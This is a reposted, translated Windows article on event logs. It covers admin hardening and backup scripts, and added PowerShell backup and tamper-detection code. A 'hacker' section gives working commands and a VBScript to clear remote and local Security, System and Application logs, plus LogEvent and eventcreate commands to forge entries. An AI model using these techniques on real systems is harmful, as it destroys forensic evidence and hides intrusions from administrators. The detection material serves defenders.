[Windows Security Settings] Protection and Forgery of Windows Logs

xiaoxiao, 2021-03-06

(forwarded from: http://www.xfocus.net/articles/200208/435.html)

The role of the system log is obvious: whether you are a network administrator or a hacker, the log matters. An experienced administrator can quickly gauge the security of a system from its log, and a smart hacker will often clear the log quickly after a successful intrusion. This article discusses the protection and forgery of logs.

1. Overview: Windows 2000 system log files include the application log, the security log, the system log, the DNS server log and so on. The application, security, system and DNS logs are stored by default under %systemroot%\system32\config, with a default file size of 512 KB.

Security log file: %SystemRoot%\System32\Config\SecEvent.Evt

System log file: %SystemRoot%\System32\Config\SysEvent.Evt

Application log file: %SystemRoot%\System32\Config\AppEvent.Evt

The locations of these log files are recorded in the registry under:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog

Some administrators relocate these logs. The EventLog key has a subkey for each log, and the directory of the corresponding log file can be found there.

2. As a network administrator:

1. Security configuration of the log:

By default the log size is 512 KB; once that limit is exceeded, an error is reported and no further events are recorded. So the first task is to change the default size. Specifically, each log subkey under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog has a MaxSize value, which can be modified directly.

Here is a script from the Microsoft site that uses WMI to set the maximum log size to 25 MB and allow the log to overwrite events older than 14 days:

This script uses WMI objects. WMI (Windows Management Instrumentation) is a system management technology that Microsoft provides for Windows; it can manage almost everything on a local or remote client system, and many professional network management tools are built on it. WMI is a standard component of Windows 2000 and Windows NT and an optional add-on under Windows 9x, so the code below runs on Windows 2000 and later.

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate,(Security)}!\\" & _
    strComputer & "\root\cimv2")                       ' get the WMI service object
Set colLogFiles = objWMIService.ExecQuery _
    ("SELECT * FROM Win32_NTEventLogFile")             ' every event log file on the host
For Each objLogFile In colLogFiles
    strLogFileName = objLogFile.Name
    Set wmiSWbemObject = GetObject _
        ("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2:" _
        & "Win32_NTEventLogFile.Name='" & strLogFileName & "'")
    wmiSWbemObject.MaxFileSize = 26214400              ' 25 MB; the value must be a multiple of 64 KB
    wmiSWbemObject.OverwriteOutDated = 14              ' only overwrite events older than 14 days
    wmiSWbemObject.Put_                                ' commit the change to the log object
Next

Save the above script in Notepad with a .vbs extension and run it.

The line strComputer = "." also needs explanation: in Windows scripts, "." is equivalent to localhost. To run the code on a remote host, simply change "." to that host's name; of course, you must first have administrator privileges on the other machine and establish an IPC connection. Every strComputer that appears in this article can be changed in the same way.
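The same configuration on a current Windows host, as an added example in Windows PowerShell (it is not code from the original article or from Microsoft's script above): it reads the existing limits, applies the article's 25 MB / 14-day policy with Limit-EventLog, and confirms the result through the MaxSize and Retention values under the EventLog registry key the article points at. Limit-EventLog ships with Windows PowerShell 5.1; the log names and the 25 MB / 14-day figures are the article's, everything else is an assumption of this example.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original article: audit and set event log size/retention
# on a current Windows host with Windows PowerShell 5.1 (Limit-EventLog is not in PowerShell 7).
# 25 MB and 14 days are the article's figures; adjust them to your own policy.

$MaxBytes      = 25MB     # PowerShell expands 25MB to 26214400, a multiple of 64 KB
$RetentionDays = 14

foreach ($log in 'Application', 'System', 'Security') {
    # Current limits as the Event Log service reports them
    $before = Get-EventLog -List | Where-Object { $_.Log -eq $log }
    '{0,-12} before: {1,8} KB, {2}, keep {3} days' -f $log,
        $before.MaximumKilobytes, $before.OverflowAction, $before.MinimumRetentionDays

    # OverwriteOlder + RetentionDays is the PowerShell form of the WMI script's
    # OverwriteOutDated = 14: events younger than 14 days are never overwritten,
    # so a full log reports an error instead of discarding fresh evidence.
    Limit-EventLog -LogName $log -MaximumSize $MaxBytes `
                   -OverflowAction OverwriteOlder -RetentionDays $RetentionDays

    # Confirm through the registry values the article points at:
    # MaxSize is stored in bytes, Retention in seconds (14 days = 1209600).
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\$log"
    $reg = Get-ItemProperty -Path $key -Name MaxSize, Retention
    '{0,-12} after : MaxSize={1} bytes, Retention={2} s' -f $log, $reg.MaxSize, $reg.Retention
}
```

Run it from an elevated prompt; the Security log cannot be reconfigured otherwise. The trade-off is the same one the article describes for the default 512 KB: with OverwriteOlder the log stops recording once it is full of events younger than the retention window, so size the log for the event rate you actually see.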

2. Querying and backing up the log:

A good administrator should get into the habit of backing up logs. If conditions allow, the logs should also be transferred to a backup machine or dumped directly to a printer. The author has an article, "Using scripts to format and output the system log", that explains in detail how Windows scripts can dump the log and output it as an HTML page; interested readers can look it up. Here I recommend Dumpel.exe from Microsoft's Resource Kit. Its common usage:

dumpel -f filename -s \\server -l log

-f filename: the location and file name of the output log

-s \\server: dump the log of a remote computer

-l log: the log to dump, one of System, Security or Application; others such as DNS may also exist

To dump the System log of the target server "server" into backupsystem.log, use the following form:

dumpel -s \\server -l system -f backupsystem.log

Combined with a scheduled task, this gives a regular backup of the system log.
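A scheduled backup in the spirit of Dumpel and the scheduled-task idea above, as an added example that is not part of the original article: it exports each log with wevtutil epl into time-stamped .evtx files, records a SHA-256 manifest so a copy can later be checked against the live log, and, when run once with -Register, installs itself as a daily scheduled task. The backup share, the script path, the task name and the schedule are placeholders to adapt.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original article: export the three classic logs to a backup
# location as time-stamped .evtx files with a SHA-256 manifest, so a log that is later
# cleared or edited can be compared with the saved copy. Run once with -Register to
# install it as a daily scheduled task. All paths are placeholders for your environment.
param(
    [string]$Dest = "\\backupserver\logs\$env:COMPUTERNAME",   # placeholder UNC share
    [string]$ScriptPath = 'C:\Scripts\Backup-EventLogs.ps1',   # where this file is saved
    [switch]$Register
)

if ($Register) {
    # Daily at 02:00 as SYSTEM; mirrors the article's "scheduled task + dumpel" idea.
    $action  = New-ScheduledTaskAction -Execute 'powershell.exe' `
        -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$ScriptPath`""
    $trigger = New-ScheduledTaskTrigger -Daily -At '02:00'
    Register-ScheduledTask -TaskName 'Backup-EventLogs' -Action $action -Trigger $trigger `
        -User 'SYSTEM' -RunLevel Highest -Force | Out-Null
    return
}

$stamp = Get-Date -Format 'yyyyMMdd-HHmm'
New-Item -ItemType Directory -Path $Dest -Force | Out-Null
$manifest = Join-Path $Dest "manifest-$stamp.txt"

foreach ($log in 'Application', 'System', 'Security') {
    $file = Join-Path $Dest "$log-$stamp.evtx"
    # wevtutil epl (export-log) writes the native .evtx format, the modern counterpart
    # of the .evt file that BackupEventLog produces in the WMI script further down.
    wevtutil epl $log $file
    if ($LASTEXITCODE -ne 0) { Write-Warning "Export of $log failed"; continue }
    $hash = (Get-FileHash -Path $file -Algorithm SHA256).Hash
    "$hash  $(Split-Path $file -Leaf)" | Add-Content -Path $manifest
}
```

Because the task runs as SYSTEM, the computer account needs write access to the share; a share the host can only write to, not delete from, is what keeps the copies useful after the host itself is compromised.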

Log backup is also easy to implement with a script that uses WMI objects.

The following is the code for backing up the Application log:

backuplog.vbs

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate,(Backup)}!\\" & _
    strComputer & "\root\cimv2")                       ' get the WMI service object with the Backup privilege
Set colLogFiles = objWMIService.ExecQuery _
    ("SELECT * FROM Win32_NTEventLogFile WHERE LogFileName = 'Application'")   ' only the Application log
For Each objLogFile In colLogFiles
    errBackupLog = objLogFile.BackupEventLog("f:\Application.evt")   ' back up the log to f:\Application.evt
    If errBackupLog <> 0 Then
        WScript.Echo "The Application event log could not be backed up."
    Else
        WScript.Echo "Success Backup Log"
    End If
Next

Program description: if the backup succeeds it prints "Success Backup Log", otherwise "The Application event log could not be backed up." The backup location f:\Application.evt can be changed as you like. The backup is in the original .evt format, which shows as garbage when opened in Notepad, so it is less convenient than Dumpel.

3. As a hacker:

1. Clearing the log:

The first thing a hacker does after breaking into a system is clear the log. If the other machine is controlled through a remote terminal, deleting the log is not difficult. Although the log also runs as a service, unlike HTTP or FTP it cannot simply be stopped and then deleted: net stop eventlog on the command line will not stop it. Some people therefore think it is hard to delete the log from the command line, but that is not actually the case. Several methods are described below:

1. With a third-party tool, such as Xiaoyan's elsave.exe, which remotely clears the System, Application and Security logs. Usage is very simple: first use the administrator account you have obtained to establish an IPC session with the other side, net use \\ip\ipc$ pass /user:user

then on the command line: elsave -s \\ip -l application -c, which clears the log named by -l (here the Application log).

This tool can also back up the log: just add the parameter -F filename. No further detail is given here.

2. Using WMI in a script can also remove the log: first get the WMI object, then call its ClearEventLog() method to delete the log. Source code:

cleanevent.vbs

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate,(Backup)}!\\" & _
    strComputer & "\root\cimv2")                       ' get the WMI service object
Dim myLogs(2)                                          ' three entries, indexed 0 to 2
myLogs(0) = "Application"
myLogs(1) = "System"
myLogs(2) = "Security"
For Each logName In myLogs
    Set colLogFiles = objWMIService.ExecQuery _
        ("SELECT * FROM Win32_NTEventLogFile WHERE LogFileName = '" & logName & "'")
    For Each objLogFile In colLogFiles
        objLogFile.ClearEventLog()                     ' clear this log
    Next
Next

The above code creates an array holding Application, System and Security; if there are other logs, they can be added to the array.

A For Each loop then deletes each element of the array, that is, each log.

2. Creating logs:

Once the log has been deleted, any administrator with a brain will react to an empty log and immediately realize there has been an intrusion, so a smart hacker learns how to forge logs:

1. Creating a log with the LogEvent method in a script is very simple; look at the code below:

createlog.vbs

Set WS = WScript.CreateObject("WScript.Shell")
WS.LogEvent 0, "Write Log Success"                    ' writes a "success" event with this description

This code is easy to read: first get a WScript.Shell object, then call the shell object's LogEvent method.

LogEvent usage: LogEvent EventType, "Description" [, RemoteSystem]

EventType is the event type and can be: 0 success, 1 error, 2 warning, 4 information, 8 audit success, 16 audit failure.

So in the above code, change the 0 to 1, 2, 4, 8 or 16 to change the type, and change the text in quotation marks to change the description.

Logs written this way have a drawback: they can only be written to the Application log, and the event source can only be WSH (Windows Scripting Host), so they are not very well concealed.

2. To make things easier for system administrators and programmers, Microsoft has a new command-line tool, eventcreate.exe, which makes creating a log even easier.

eventcreate -s server -l logname -u username -p password -so source -t eventtype -id id -d description

Meaning: -s creates the log on a remote host; -u and -p are the remote host's user name and password

-l the log; System and Application entries can be created, but a Security log entry cannot.

-so the log source, which can be any string; -t the log type, such as Information, Error or Warning

-d the log description, which can be any sentence; -id the event ID, which you choose yourself from 1 to 1000

For example, to create a System log entry locally with source admin, type warning, description "this is a test" and event ID 500,

you can use the following parameters:

eventcreate -l system -so administrator -t warning -d "this is a test" -id 500

This tool cannot create a Security log entry. As for how to create a Security log entry, I hope everyone can find a good way!
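Each of the techniques in section 3 leaves a trace an administrator can search for, and the following Windows PowerShell function is an added example (not from the original article) that collects them: Security event 1102 and System event 104, which the Event Log service writes when a log is cleared (Windows Vista and later IDs); Application events from source WSH, which is what WScript.Shell.LogEvent produces; and event sources whose EventMessageFile points at eventcreate.exe, which is how EventCreate registers the source names it is given. The function name, the 7-day default and the eventcreate registration check are assumptions of this example to verify on your own build.

```powershell
# Added example, not from the original article: a defender's check for the traces that the
# techniques in section 3 leave behind. Assumes Windows Vista or later event IDs; the
# function name, the 7-day default and the eventcreate registration check are assumptions.
function Find-LogTampering {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)

    # 1. Clearing. The Event Log service records its own clearing: Security 1102
    #    ("The audit log was cleared") and System 104 for every other log. The record
    #    is written right after the clear, so an empty log with no 1102/104 behind it
    #    points to something other than a normal clear.
    $specs = @{ LogName = 'Security'; Id = 1102; StartTime = $since },
             @{ LogName = 'System';   Id = 104;  StartTime = $since }
    $cleared = foreach ($spec in $specs) {
        Get-WinEvent -FilterHashtable $spec -ErrorAction SilentlyContinue
    }

    # 2. Forging with WScript.Shell.LogEvent: always lands in Application with source WSH.
    $wsh = Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'WSH'; StartTime = $since } `
                        -ErrorAction SilentlyContinue

    # 3. Forging with eventcreate.exe: the tool registers whatever source name it is given
    #    under the log's EventLog registry key, with EventMessageFile pointing at
    #    eventcreate.exe (assumption: verify on your own build). Sources registered that
    #    way stay behind even after the forged events themselves are gone.
    $fakeSources = foreach ($log in 'Application', 'System') {
        Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\$log" |
            Where-Object { (Get-ItemProperty $_.PSPath).EventMessageFile -match 'eventcreate\.exe' } |
            ForEach-Object { [pscustomobject]@{ Log = $log; Source = $_.PSChildName } }
    }

    [pscustomobject]@{
        ClearEvents     = $cleared | Select-Object TimeCreated, LogName, Id, @{ n = 'User'; e = { $_.UserId } }
        WshEvents       = $wsh     | Select-Object TimeCreated, Id, LevelDisplayName, Message
        EventCreateSrcs = $fakeSources
    }
}

Find-LogTampering -Days 30 | Format-List
```

Run it from an elevated prompt, since reading the Security log requires it. The 1102/104 check is the strongest of the three: it is written by the service itself, so the only way to remove it is a second clear, which writes it again. The other two are heuristics for the specific tools the article describes and will not catch an event written through a properly registered source.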

Please credit the original URL when reposting: https://www.9cbs.com/read-56550.html
